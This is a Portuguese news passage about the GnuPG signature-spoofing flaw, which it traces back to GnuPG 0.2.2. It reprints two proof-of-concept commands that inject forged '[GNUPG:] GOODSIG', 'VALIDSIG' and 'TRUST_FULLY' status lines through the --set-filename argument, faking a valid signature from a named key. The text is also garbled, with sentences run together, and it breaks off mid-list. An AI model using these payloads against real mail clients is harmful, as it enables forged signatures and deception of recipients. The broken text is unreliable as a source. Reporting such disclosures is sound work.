"O GnuPG não é usado apenas para segurança de e-mail, mas também para proteger backups, atualizações de software em distribuições e código-fonte em sistemas de controle de versão como o Git."
$ echo 'Please send me one of those expensive washing machines.' \ | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \ \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\ \n[GNUPG:] TRUST_FULLY 0 classic\ \ngpg: '\'`" > poc1.msgUma segunda façanha é:
echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \ \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\ \n[GNUPG:] TRUST_FULLY\ \n[GNUPG:] BEGIN_DECRYPTION\ \n[GNUPG:] DECRYPTION_OKAY\ \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\ \ngpg: '\'`" > poc2.msgA causa do bug remete ao GnuPG 0.2.2 de 1998
"E embora o impacto tenha sido diferente e tenha mudado ao longo do tempo à medida que mais aplicativos usem o GPG".Ele divulgou publicamente a vulnerabilidade apenas depois que os desenvolvedores das ferramentas conhecidas como vulneráveis foram corrigidos. As falhas são corrigidas nos programas: